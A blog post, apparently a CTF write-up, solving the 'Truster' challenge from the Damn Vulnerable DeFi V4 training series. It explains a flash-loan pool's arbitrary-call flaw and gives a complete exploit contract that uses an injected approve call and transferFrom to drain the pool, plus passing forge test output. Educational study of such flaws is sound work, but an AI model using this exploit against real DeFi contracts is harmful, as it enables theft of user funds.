<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="Foued SAIDI">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://fouedsaidi.com/2025/12/31/damn-vulnerable-defi-v4-truster/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="OverviewHello everyone! Hope you are doing great! I’m back again with a new Blockchain&#x2F;Web3 by tackling the third challenge from the Damn Vulnerable DeFi  series created by The Red Guild  where I">
<meta property="og:type" content="article">
<meta property="og:title" content="Damn Vulnerable DeFi V4: Truster">
<meta property="og:url" content="http://fouedsaidi.com/2025/12/31/Damn-Vulnerable-DeFi-V4-Truster/index.html">
<meta property="og:site_name" content="Foued Saidi&#39;s Blog">
<meta property="og:description" content="OverviewHello everyone! Hope you are doing great! I’m back again with a new Blockchain&#x2F;Web3 by tackling the third challenge from the Damn Vulnerable DeFi  series created by The Red Guild  where I">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://fouedsaidi.com/images/Blockchain/DVDeFi/Truster/Truster.png">
<meta property="article:published_time" content="2025-12-31T15:41:32.000Z">
<meta property="article:modified_time" content="2025-12-31T13:54:26.179Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://fouedsaidi.com/images/Blockchain/DVDeFi/Truster/Truster.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/logo.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
    <meta name="theme-color" content="#5618ff">
    <link rel="shortcut icon" href="/images/logo.png">
    <!--- Page Info-->
    
    <title>
        
            Damn Vulnerable DeFi V4: Truster -
        
        Foued Saidi&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    window.config = {"hostname":"fouedsaidi.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"5px","image_alignment":"center","image_caption":true,"link_icon":true,"title_alignment":"left"},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"Articles","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#5618ff","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":true,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Hello, I'm Foued SAIDI 👋","subtitle":{"text":[],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":50,"backing_speed":50,"starting_delay":500,"backing_delay":1200,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"links":{"github":"https://github.com/kujen5","instagram":null,"zhihu":null,"twitter":"https://twitter.com/_kujen5","email":null,"linkedin":"https://www.linkedin.com/in/foued-saidi-pro/"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.5.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Categories":{"path":"/categories","icon":"fa-regular fa-folder"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about","Github":"https://github.com/kujen5","LinkedIn":"https://www.linkedin.com/in/foued-saidi-pro/"}}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":{"Categories":{"path":"/categories","icon":"fa-regular fa-folder"}}},"article_date_format":"auto","categories":{"enable":true,"limit":2},"tags":{"enable":true,"limit":3}},"footerStart":"2023/12/22 00:00:00"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.0.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <span class="swup-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Foued Saidi&#39;s Blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/archives"  >
                                    
                                        
                                            <i class="fa-regular fa-archive"></i>
                                        
                                        ARCHIVES
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/categories"  >
                                    
                                        
                                            <i class="fa-regular fa-folder"></i>
                                        
                                        CATEGORIES
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown" 
                                    href="#" onClick="return false;">
                                    
                                        
                                            <i class="fa-regular fa-user"></i>
                                        
                                        ABOUT&nbsp;<i class="fa-solid fa-chevron-down"></i>
                                    
                                </a>
                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                    
                                        <li>
                                        <a href="/about">ME
                                        </a>
                                        </li>
                                    
                                        <li>
                                        <a target="_blank" rel="noopener" href="https://github.com/kujen5">GITHUB
                                        </a>
                                        </li>
                                    
                                        <li>
                                        <a target="_blank" rel="noopener" href="https://www.linkedin.com/in/foued-saidi-pro/">LINKEDIN
                                        </a>
                                        </li>
                                    
                                    </ul>
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer w-full absolute top-0 left-0 bg-background-color">
        <ul class="drawer-navbar-list flex flex-col justify-start items-center">
            
                
                    <li class="drawer-navbar-item text-base my-1.5 flex justify-center items-center">
                        <a class="rounded-3xl py-1.5 px-5 hover:border hover:!text-primary active:!text-primary group " 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item text-base my-1.5 flex justify-center items-center">
                        <a class="rounded-3xl py-1.5 px-5 hover:border hover:!text-primary active:!text-primary group " 
                        href="/archives"  >
                             
                                
                                    <i class="fa-regular fa-archive"></i>
                                
                                ARCHIVES
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item text-base my-1.5 flex justify-center items-center">
                        <a class="rounded-3xl py-1.5 px-5 hover:border hover:!text-primary active:!text-primary group " 
                        href="/categories"  >
                             
                                
                                    <i class="fa-regular fa-folder"></i>
                                
                                CATEGORIES
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item text-base my-1.5 flex justify-center items-center">
                        <a class="rounded-3xl py-1.5 px-5 hover:border hover:!text-primary active:!text-primary group has-dropdown" 
                        href="#" onClick="return false;">
                            
                                
                                    <i class="fa-regular fa-user"></i>
                                
                                ABOUT&nbsp;<i class="group-hover:rotate-180 transition-transform fa-solid fa-chevron-down"></i>
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                              
                        
                            <li class="drawer-navbar-item text-base flex justify-center items-center hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                <a class="py-0.5" href="/about">ME</a>
                            </li>
                        
                            <li class="drawer-navbar-item text-base flex justify-center items-center hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                <a class="py-0.5" target="_blank" rel="noopener" href="https://github.com/kujen5">GITHUB</a>
                            </li>
                        
                            <li class="drawer-navbar-item text-base flex justify-center items-center hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                <a class="py-0.5" target="_blank" rel="noopener" href="https://www.linkedin.com/in/foued-saidi-pro/">LINKEDIN</a>
                            </li>
                        
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color text-4xl md:text-6xl font-bold px-2 sm:px-6 md:px-8 py-3">Damn Vulnerable DeFi V4: Truster</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/logo.png">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">Foued SAIDI</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv5</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-12-31 16:41:32</span>
        <span class="mobile">2025-12-31 16:41:32</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-12-31 14:54:26</span>
            <span class="mobile">2025-12-31 14:54:26</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/Damn-Vulnerable-DeFi/">Damn Vulnerable DeFi</a>&nbsp;
                        </li>
                    
                    
                
                    
                        <li>
                            | <a href="/categories/Blockchain-Web3/">Blockchain/Web3</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="Overview"><a href="#Overview" class="headerlink" title="Overview"></a>Overview</h1><p>Hello everyone! Hope you are doing great!</p>
<p>I’m back again with a new Blockchain&#x2F;Web3 by tackling the third challenge from the <a class="link"   target="_blank" rel="noopener" href="https://www.damnvulnerabledefi.xyz/" >Damn Vulnerable DeFi <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> series created by <a class="link"   target="_blank" rel="noopener" href="https://theredguild.org/" >The Red Guild <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> where I will be explaining the challenge in depth, my approach to solving it and my solutions.</p>
<p>Hope you enjoy it and learn something new!</p>
<p>Check the previous <a href="https://fouedsaidi.com/2025/12/18/Damn-Vulnerable-DeFi-V4-Naive-Receiver/">Damn Vulnerable DeFi challenge called Naive Receiver from this blog post</a>. Enjoy!</p>
<h1 id="‘Truster’-challenge"><a href="#‘Truster’-challenge" class="headerlink" title="‘Truster’ challenge"></a>‘Truster’ challenge</h1><p><figure class="image-caption"><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Blockchain/DVDeFi/Truster/Truster.png"
                      alt="Truster"
                ><figcaption>Truster</figcaption></figure></p>
<h2 id="Challenge-Description"><a href="#Challenge-Description" class="headerlink" title="Challenge Description"></a>Challenge Description</h2><p>More and more lending pools are offering flashloans. In this case, a new pool has launched that is offering flashloans of DVT tokens for free.</p>
<p>The pool holds 1 million DVT tokens. You have nothing.</p>
<p>To pass this challenge, rescue all funds in the pool executing a single transaction. Deposit the funds into the designated recovery account.</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.damnvulnerabledefi.xyz/challenges/truster/" >Link to the original challenge <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://github.com/kujen5/Damn-Vulnerable-Defi-Solutions/tree/main/Truster" >Github repo link that contains challenge code and solver <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h1 id="Understanding-the-contract"><a href="#Understanding-the-contract" class="headerlink" title="Understanding the contract"></a>Understanding the contract</h1><h2 id="Overview-1"><a href="#Overview-1" class="headerlink" title="Overview"></a>Overview</h2><p>We have 2 main contracts:</p>
<h3 id="DamnValuableToken-sol"><a href="#DamnValuableToken-sol" class="headerlink" title="DamnValuableToken.sol"></a>DamnValuableToken.sol</h3><p>This is the definition contract of the Damn Valuable Token (DVT): an <a class="link"   target="_blank" rel="noopener" href="https://ethereum.org/developers/docs/standards/tokens/erc-20/" >ERC20() <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> token that will be the currency (token) in this project.</p>
<p>We can see that this token has 18 decimals</p>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">contract <span class="title class_">DamnValuableToken</span> is <span class="title class_">ERC20</span> &#123;</span><br><span class="line">    <span class="title function_">constructor</span>(<span class="params"></span>) <span class="title class_">ERC20</span>(<span class="string">&quot;DamnValuableToken&quot;</span>, <span class="string">&quot;DVT&quot;</span>, <span class="number">18</span>) &#123;</span><br><span class="line">        <span class="title function_">_mint</span>(msg.<span class="property">sender</span>, <span class="title function_">type</span>(uint256).<span class="property">max</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="TrusterLenderPool-sol"><a href="#TrusterLenderPool-sol" class="headerlink" title="TrusterLenderPool.sol"></a>TrusterLenderPool.sol</h3><p>This is a smart contract that offers <a class="link"   target="_blank" rel="noopener" href="https://eips.ethereum.org/EIPS/eip-3156" >Flash Loans <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> through the <code>TrusterLenderPool::flashLoan()</code> method.</p>
<ol>
<li>First we fix the contract balance prior to supplying the flashloan to the borrower:</li>
</ol>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uint256 balanceBefore = token.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>));</span><br></pre></td></tr></table></figure></div>

<ol start="2">
<li>Next we will transfer the tokens to the borrower wallet:</li>
</ol>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">token.<span class="title function_">transfer</span>(borrower, amount);</span><br></pre></td></tr></table></figure></div>

<ol start="3">
<li>Now the contract allows the borrower to execute a function call through the OpenZeppelin <code>Address::functionCall()</code>:</li>
</ol>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">target.<span class="title function_">functionCall</span>(data);</span><br></pre></td></tr></table></figure></div>

<p>We can see below the definition of the method:</p>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">functionCall</span>(<span class="params">address target, bytes memory data</span>) internal returns (bytes memory) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_">functionCallWithValue</span>(target, data, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">functionCallWithValue</span>(<span class="params">address target, bytes memory data, uint256 value</span>) internal returns (bytes memory) &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_">address</span>(<span class="variable language_">this</span>).<span class="property">balance</span> &lt; value) &#123;</span><br><span class="line">            revert <span class="title class_">Errors</span>.<span class="title class_">InsufficientBalance</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>).<span class="property">balance</span>, value);</span><br><span class="line">        &#125;</span><br><span class="line">        bool success = <span class="title class_">LowLevelCall</span>.<span class="title function_">callNoReturn</span>(target, value, data);</span><br><span class="line">        <span class="keyword">if</span> (success &amp;&amp; (<span class="title class_">LowLevelCall</span>.<span class="title function_">returnDataSize</span>() &gt; <span class="number">0</span> || target.<span class="property">code</span>.<span class="property">length</span> &gt; <span class="number">0</span>)) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="title class_">LowLevelCall</span>.<span class="title function_">returnData</span>();</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (success) &#123;</span><br><span class="line">            revert <span class="title class_">AddressEmptyCode</span>(target);</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="title class_">LowLevelCall</span>.<span class="title function_">returnDataSize</span>() &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="title class_">LowLevelCall</span>.<span class="title function_">bubbleRevert</span>();</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            revert <span class="title class_">Errors</span>.<span class="title class_">FailedCall</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></div>

<p>What this basically does is that it will take a target contract address and some calldata, then it will execute the bytes function call from within the calldata as a low level call. Providing direct arbitrary method execution.</p>
<ol start="4">
<li>Finally we will make a check that the borrower actually returned the loaned amount to the contract:</li>
</ol>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (token.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>)) &lt; balanceBefore) &#123;</span><br><span class="line">            revert <span class="title class_">RepayFailed</span>();</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure></div>

<h2 id="Point-of-Failure"><a href="#Point-of-Failure" class="headerlink" title="Point of Failure"></a>Point of Failure</h2><p>What directly stands out from the contract is the usage of <code>functionCall()</code> applied on a user-supplied target contract. This represents a very serious issue as the user can invoke whatever method they want (by encoding the method ABI and executing it on the target as a low level call.). This will allow the borrower to approve token spending from the contract and then steal all the tokens after the flash loan transaction finishes.</p>
<h1 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h1><p>Our main goal from the challenge is to rescue all the tokens and send them to the recovery account wallet.</p>
<p>The steps to do this are clear:</p>
<ol>
<li>Create calldata that will be used to approve coins spending <strong>BY</strong> the contract itself, because it is the owner of the contract and the only one that can allow spending:</li>
</ol>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bytes memory data=abi.<span class="title function_">encodeWithSignature</span>(<span class="string">&quot;approve(address,uint256)&quot;</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>),p_token.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(p_pool)));</span><br></pre></td></tr></table></figure></div>

<p>This will encode the <code>approve</code> method which approves the spending of the entire contract balance: <code>p_token.balanceOf(address(p_pool))</code> to the malicious contract: <code>address(this)</code></p>
<ol start="2">
<li>Next, we will request a flash loan with 0 DVT, this is to pass the <code>if (token.balanceOf(address(this)) &lt; balanceBefore)</code> check. We will pass the current exploit contract as the borrower and the <code>Truster</code> contract as the target contract (so the approval happens through it and gets validated.):</li>
</ol>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p_pool.<span class="title function_">flashLoan</span>(<span class="number">0</span>,<span class="title function_">address</span>(<span class="variable language_">this</span>),<span class="title function_">address</span>(p_token),data); <span class="comment">//this doesn&#x27;t take any money from the contract</span></span><br></pre></td></tr></table></figure></div>

<ol start="3">
<li>Finally, after the flashloan transaction finishes, we will find ourselves with the spending of the entire contract balance <strong>approved</strong>. So we can just send all the tokens to the recovery challenge and successfully rescue them:</li>
</ol>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p_token.<span class="title function_">transferFrom</span>(<span class="title function_">address</span>(p_pool),p_recovery,p_token.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(p_pool)));</span><br></pre></td></tr></table></figure></div>

<h2 id="Exploit-Test-Case"><a href="#Exploit-Test-Case" class="headerlink" title="Exploit Test Case"></a>Exploit Test Case</h2><p>Below you can find the full test case.<br>First, the exploitation contract (because we have to call a contract inside the <code>functionCall</code> method):</p>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">contract <span class="title class_">TrusterExploit</span> &#123;</span><br><span class="line">    <span class="title class_">TrusterLenderPool</span> pool;</span><br><span class="line">    <span class="title class_">DamnValuableToken</span> token;</span><br><span class="line">    address public recovery;</span><br><span class="line"></span><br><span class="line">    <span class="title function_">constructor</span>(<span class="params">TrusterLenderPool p_pool,DamnValuableToken p_token,address p_recovery</span>)&#123;</span><br><span class="line">        bytes memory data=abi.<span class="title function_">encodeWithSignature</span>(<span class="string">&quot;approve(address,uint256)&quot;</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>),p_token.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(p_pool)));</span><br><span class="line">        p_pool.<span class="title function_">flashLoan</span>(<span class="number">0</span>,<span class="title function_">address</span>(<span class="variable language_">this</span>),<span class="title function_">address</span>(p_token),data);</span><br><span class="line">        p_token.<span class="title function_">transferFrom</span>(<span class="title function_">address</span>(p_pool),p_recovery,p_token.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(p_pool)));</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>And the call from inside the test case:</p>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">test_truster</span>(<span class="params"></span>) public checkSolvedByPlayer &#123;</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">TrusterExploit</span>(pool,token,recovery);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></div>

<p>This takes the <code>checkSolvedByPlayer</code> modifier behavior which performs these checks:</p>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_">assertEq</span>(vm.<span class="title function_">getNonce</span>(player), <span class="number">1</span>, <span class="string">&quot;Player executed more than one tx&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// All rescued funds sent to recovery account</span></span><br><span class="line"><span class="title function_">assertEq</span>(token.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(pool)), <span class="number">0</span>, <span class="string">&quot;Pool still has tokens&quot;</span>);</span><br><span class="line"><span class="title function_">assertEq</span>(token.<span class="title function_">balanceOf</span>(recovery), <span class="variable constant_">TOKENS_IN_POOL</span>, <span class="string">&quot;Not enough tokens in recovery account&quot;</span>);</span><br></pre></td></tr></table></figure></div>

<p>The output is as follows:</p>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$ forge test -vv</span><br><span class="line">[⠊] <span class="title class_">Compiling</span>...</span><br><span class="line">[⠒] <span class="title class_">Compiling</span> <span class="number">1</span> files <span class="keyword">with</span> <span class="title class_">Solc</span> <span class="number">0.8</span><span class="number">.25</span></span><br><span class="line">[⠑] <span class="title class_">Solc</span> <span class="number">0.8</span><span class="number">.25</span> finished <span class="keyword">in</span> <span class="number">593.</span>10ms</span><br><span class="line"><span class="title class_">Compiler</span> run successful!</span><br><span class="line"></span><br><span class="line"><span class="title class_">Ran</span> <span class="number">2</span> tests <span class="keyword">for</span> test/<span class="title class_">Truster</span>.<span class="property">t</span>.<span class="property">sol</span>:<span class="title class_">TrusterChallenge</span></span><br><span class="line">[<span class="variable constant_">PASS</span>] <span class="title function_">test_assertInitialState</span>() (<span class="attr">gas</span>: <span class="number">20313</span>)</span><br><span class="line">[<span class="variable constant_">PASS</span>] <span class="title function_">test_truster</span>() (<span class="attr">gas</span>: <span class="number">165133</span>)</span><br><span class="line"><span class="title class_">Logs</span>:</span><br><span class="line">  <span class="title class_">Contract</span> balance before <span class="attr">exploit</span>:  <span class="number">1000000000000000000000000</span></span><br><span class="line"></span><br><span class="line">---<span class="title class_">Exploit</span>---</span><br><span class="line"></span><br><span class="line">  <span class="title class_">Contract</span> balance after <span class="attr">exploit</span>:  <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="title class_">Suite</span> <span class="attr">result</span>: ok. <span class="number">2</span> passed; <span class="number">0</span> failed; <span class="number">0</span> skipped; finished <span class="keyword">in</span> <span class="number">1.</span>62ms (<span class="number">396.70</span>µs <span class="variable constant_">CPU</span> time)</span><br><span class="line"></span><br><span class="line"><span class="title class_">Ran</span> <span class="number">1</span> test suite <span class="keyword">in</span> <span class="number">7.</span>93ms (<span class="number">1.</span>62ms <span class="variable constant_">CPU</span> time): <span class="number">2</span> tests passed, <span class="number">0</span> failed, <span class="number">0</span> skipped (<span class="number">2</span> total tests)</span><br></pre></td></tr></table></figure></div>

<p>And Tadaaa! Solved!</p>
<h1 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h1><p>That was it for the <code>Truster</code> challenge from <code>Damn Vulnerable DeFi</code> series.</p>
